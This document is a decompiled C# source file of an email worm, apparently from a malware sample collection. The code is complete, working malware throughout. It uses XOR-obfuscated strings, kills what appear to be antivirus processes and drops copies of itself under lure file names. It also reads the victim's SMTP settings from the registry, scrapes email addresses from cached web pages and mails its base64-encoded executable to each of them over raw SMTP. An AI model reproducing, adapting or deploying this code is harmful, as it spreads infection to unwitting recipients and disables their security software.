MalwareSourceCode/MSIL/Email-Worm/Win32/A/Email-Worm.Win32.Alcaul.ah-98dd24e5e033f2e78507476db2f52ed25e62a1f201b7f499b5ab1b19cb625b73/drunkenpope/brigada8.cs

231 lines
10 KiB
C#
Raw Normal View History

2022-08-18 11:28:56 +00:00
// Decompiled with JetBrains decompiler
// Type: drunkenpope.brigada8
// Assembly: b, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: CECE5B53-4BE2-43C6-85BC-E30F20D8366F
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.Win32.Alcaul.ah-98dd24e5e033f2e78507476db2f52ed25e62a1f201b7f499b5ab1b19cb625b73.exe
using Microsoft.Win32;
using System;
using System.Diagnostics;
using System.IO;
using System.Net.Sockets;
using System.Reflection;
using System.Text;
using System.Windows.Forms;
namespace drunkenpope
{
public class brigada8
{
public static void Main(string[] args)
{
try
{
string str1 = brigada8.modem("xmlgcncpo.udklft10.t`4.ug`qaclz.tqqvcv.tqjukl10.tqgamop.tqacl62.tgvvpc{.tgv;7.vfq0/lv.vfq0/;:.vac.v`qacl.quggr;7.qrjklz.qoa.qgpt;7.qapqacl.qaclro.qacl;7.qacl10.qcdgug`.pgqawg.pct5ukl.pct5.rgpqdu.raducnnkaml.raaukl;:.rctu.rctqajgf.rctan.rcfokl.mwvrmqv.lta;7.lwrepcfg.lmpokqv.lockl.lkqwo.lctulv.lctu10.lctlv.lctnw10.lctcru10.l10qaclu.ordvpc{.ommnktg.nwcnn.nmmimwv.nmaifmul0222.hgfk.kmoml;:.kdcag.kaqwrrlv.kaqwrr;7.kaoml.kanmcflv.kanmcf;7.k`octqr.k`ocql.kcoqgpt.kcocrr.dpu.drpmv.dr/ukl.dklftkpw.d/qvmru.d/rpmv;7.d/rpmv.d/celv;7.gqrucvaj.gqcdg.gagleklg");
string str2 = brigada8.modem("ftr;7]2.ftr;7.angclgp1.angclgp.ancu;7ad.ancu;7.adklgv10.adklgv.adkcwfkv.adkcfokl.`ncaikag.`ncaif.ctuwrf10.ctukl;7.ctqajgf10.ctrwrf.ctrva10.ctro.ctrfmq10.ctraa.ctr10.ctr.ctlv.ctiqgpt.cteavpn.ctg10.ctamlqmn.cwvmfmul.crtzfukl.clvk/vpmhcl.caiukl10.]ctro.]ctraa.]ctr10");
string[] strArray1 = str1.Split(',');
string[] strArray2 = str2.Split(',');
foreach (string vry324 in strArray1)
brigada8.kernelhalt(vry324);
foreach (string vry324 in strArray2)
brigada8.kernelhalt(vry324);
Module module = Assembly.GetExecutingAssembly().GetModules()[0];
string akt7 = brigada8.xmlparse234(module.FullyQualifiedName);
Registry.CurrentUser.OpenSubKey(brigada8.modem("Qmdvucpg^Icxcc^NmacnAmlvglv"), true).SetValue(brigada8.modem("Fkp2"), (object) (brigada8.modem("2301678") + Directory.GetCurrentDirectory()));
string[] strArray3 = new string[4]
{
brigada8.modem("Tkqwcn]Qvwfkm,LGV0221]ig{,gzg"),
brigada8.modem("vgcaj]{mwpqgnd]a!]kl]3]uggi,gzg"),
brigada8.modem("jkvocl0,gzg"),
brigada8.modem("Vgiigl6]dwnn,gzg")
};
foreach (string destFileName in strArray3)
{
try
{
File.Copy(module.FullyQualifiedName, destFileName);
}
catch
{
}
}
RegistryKey registryKey1 = Registry.CurrentUser.OpenSubKey(brigada8.modem("Qmdvucpg^Okapmqmdv^Klvgplgv\"Caamwlv\"Oclcegp"), true);
RegistryKey registryKey2 = Registry.CurrentUser.OpenSubKey(brigada8.modem("Qmdvucpg^Okapmqmdv^Klvgplgv\"Caamwlv\"Oclcegp^Caamwlvq^") + registryKey1.GetValue(brigada8.modem("Fgdcwnv\"Ockn\"Caamwlv")).ToString(), true);
string m91 = registryKey2.GetValue(brigada8.modem("QOVR\"Qgptgp")).ToString();
string foam = registryKey2.GetValue(brigada8.modem("QOVR\"Gockn\"Cffpgqq")).ToString();
foreach (string directory1 in Directory.GetDirectories(Environment.GetFolderPath(Environment.SpecialFolder.InternetCache)))
{
foreach (string directory2 in Directory.GetDirectories(directory1))
{
foreach (string file in Directory.GetFiles(directory2, brigada8.modem("(,jv(")))
brigada8.melee(file, m91, foam, akt7);
}
}
int num = (int) MessageBox.Show(brigada8.modem("lm\"ompg\"`gvc\"vumq"), brigada8.modem("oqkn,ocqq,`\"*a!n{\"ocfg+\"`{\"cnamrcwn-`pkecfc\"majm"), MessageBoxButtons.OK, MessageBoxIcon.Exclamation);
}
catch
{
}
}
public static void melee(string f91, string m91, string foam, string akt7)
{
StreamReader streamReader = new StreamReader((Stream) new FileStream(f91, FileMode.OpenOrCreate, FileAccess.Read));
streamReader.BaseStream.Seek(0L, SeekOrigin.Begin);
while (streamReader.Peek() > -1)
{
string hjkl = brigada8.harvest(streamReader.ReadLine());
if (hjkl != "")
{
try
{
brigada8.codedom563(m91, foam, hjkl, akt7);
}
catch
{
}
}
}
streamReader.Close();
}
public static string harvest(string helga)
{
char[] anyOf = new char[6]
{
'?',
'\'',
'"',
'>',
'<',
' '
};
string str1 = helga;
try
{
int sourceIndex = str1.IndexOf(brigada8.modem("ocknvm8"));
int num = str1.LastIndexOfAny(anyOf);
char[] destination1 = new char[(int) checked ((uint) unchecked (num - sourceIndex))];
str1.CopyTo(sourceIndex, destination1, 0, num - sourceIndex);
string str2 = new string(destination1).Replace(brigada8.modem("ocknvm8"), "").Replace("%20", "").Replace("%40", "@");
try
{
int count = str2.IndexOfAny(anyOf);
char[] destination2 = new char[(int) checked ((uint) count)];
str2.CopyTo(0, destination2, 0, count);
return new string(destination2);
}
catch
{
return str2;
}
}
catch
{
return "";
}
}
public static string xmlparse234(string tukoo)
{
FileStream input = new FileStream(tukoo, FileMode.OpenOrCreate, FileAccess.Read);
BinaryReader binaryReader = new BinaryReader((Stream) input);
binaryReader.BaseStream.Seek(0L, SeekOrigin.Begin);
byte[] numArray = new byte[(int) checked ((uint) input.Length)];
int length1 = (int) input.Length;
int index1 = 0;
int num;
for (; length1 > 0; length1 -= num)
{
num = binaryReader.Read(numArray, index1, length1);
if (num != 0)
index1 += num;
else
break;
}
binaryReader.Close();
StringBuilder stringBuilder = new StringBuilder();
string base64String = Convert.ToBase64String(numArray);
int length2 = base64String.Length;
char[] destination = new char[(int) checked ((uint) length2)];
base64String.CopyTo(0, destination, 0, length2);
for (int index2 = 1; index2 <= length2; ++index2)
{
if (index2 % 76 == 0)
stringBuilder.Append(string.Format("{0}\r\n", (object) destination[index2 - 1]));
else
stringBuilder.Append(string.Format("{0}", (object) destination[index2 - 1]));
}
return stringBuilder.ToString();
}
public static void kernelhalt(string vry324)
{
foreach (Process process in Process.GetProcessesByName(vry324))
process.Kill();
}
public static string modem(string hhh)
{
StringBuilder stringBuilder = new StringBuilder();
for (int index = 0; index < hhh.Length; ++index)
{
int num = Convert.ToInt32(hhh[index]) ^ 2;
stringBuilder.Append(Convert.ToChar(num));
}
return stringBuilder.ToString();
}
public static void codedom563(string asdf, string cvbn, string hjkl, string tukoo)
{
string str1 = brigada8.modem("Dpmo8\"") + cvbn + " <" + cvbn + ">\r\n";
string str2 = brigada8.modem("Vm8\"") + hjkl + " <" + hjkl + ">\r\n";
string str3 = brigada8.modem("Fcvg8\"") + DateTime.Now.ToString() + "\r\n";
string str4 = brigada8.modem("Z/Ockngp8\"fmlmvvmwaj") + "\r\n";
string str5 = brigada8.modem("Z/Rpkmpkv{8\"1") + "\r\n";
string str6 = brigada8.modem("OKOG/Tgpqkml8\"3,2") + "\r\n";
string str7 = brigada8.modem("Amlvglv/V{rg8\"ownvkrcpv-okzgf9\"`mwlfcp{? //`q`h 9") + "\r\n\r\n";
string str8 = brigada8.modem("Vjkq\"kq\"c\"ownvk/rcpv\"ogqqceg\"kl\"OKOG\"dmpocv,") + "\r\n\r\n";
string str9 = "----bsbj\r\n";
string str10 = brigada8.modem("Amlvglv/V{rg8\"vgzv-jvon9\"ajcpqgv?wq/cqakk") + "\r\n\r\n";
string str11 = brigada8.modem(" Rggp/vm/Rggp\",LGV\"Qmdvucpg\"cvvcajgf,\"Pgswkpgq\"vjg\",LGV\"dpcogumpi, ") + "\r\n\r\n";
string str12 = "----bsbj\r\n";
string str13 = brigada8.modem("Amlvglv/V{rg8\"crrnkacvkml-z/oqfmulnmcf9\"lcog? lgvdz3,gzg ") + "\r\n";
string str14 = brigada8.modem("Amlvglv/Vpclqdgp/Glamfkle8\"`cqg46") + "\r\n";
string str15 = brigada8.modem("Amlvglv/Fkqrmqkvkml8\"cvvcajoglv9\"");
string str16 = brigada8.modem("dknglcog? lgvdz3,gzg ") + "\r\n\r\n";
string str17 = "\r\n\r\n";
string str18 = "----bsbj--\r\n\r\n.\r\n";
TcpClient tcpClient = new TcpClient(asdf, 25);
NetworkStream stream = tcpClient.GetStream();
StreamReader streamReader = new StreamReader((Stream) tcpClient.GetStream());
string str19 = streamReader.ReadLine();
byte[] bytes1 = Encoding.ASCII.GetBytes(brigada8.modem("JGNM\"nmacnjmqv") + "\r\n");
stream.Write(bytes1, 0, bytes1.Length);
str19 = streamReader.ReadLine();
byte[] bytes2 = Encoding.ASCII.GetBytes(brigada8.modem("OCKN\"DPMO8\"") + "<" + cvbn + ">\r\n");
stream.Write(bytes2, 0, bytes2.Length);
str19 = streamReader.ReadLine();
byte[] bytes3 = Encoding.ASCII.GetBytes(brigada8.modem("PARV\"VM8\"") + "<" + hjkl + ">\r\n");
stream.Write(bytes3, 0, bytes3.Length);
str19 = streamReader.ReadLine();
byte[] bytes4 = Encoding.ASCII.GetBytes(brigada8.modem("FCVC") + "\r\n");
stream.Write(bytes4, 0, bytes4.Length);
str19 = streamReader.ReadLine();
byte[] bytes5 = Encoding.ASCII.GetBytes(str1 + str2 + str3 + str4 + str5);
stream.Write(bytes5, 0, bytes5.Length);
byte[] bytes6 = Encoding.ASCII.GetBytes(str6 + str7 + str8 + str9 + str10 + str11);
stream.Write(bytes6, 0, bytes6.Length);
byte[] bytes7 = Encoding.ASCII.GetBytes(str12 + str13 + str14 + str15 + str16 + tukoo + str17 + str18);
stream.Write(bytes7, 0, bytes7.Length);
str19 = streamReader.ReadLine();
byte[] bytes8 = Encoding.ASCII.GetBytes(brigada8.modem("SWKV") + "\r\n");
stream.Write(bytes8, 0, bytes8.Length);
str19 = streamReader.ReadLine();
stream.Close();
streamReader.Close();
tcpClient.Close();
}
}
}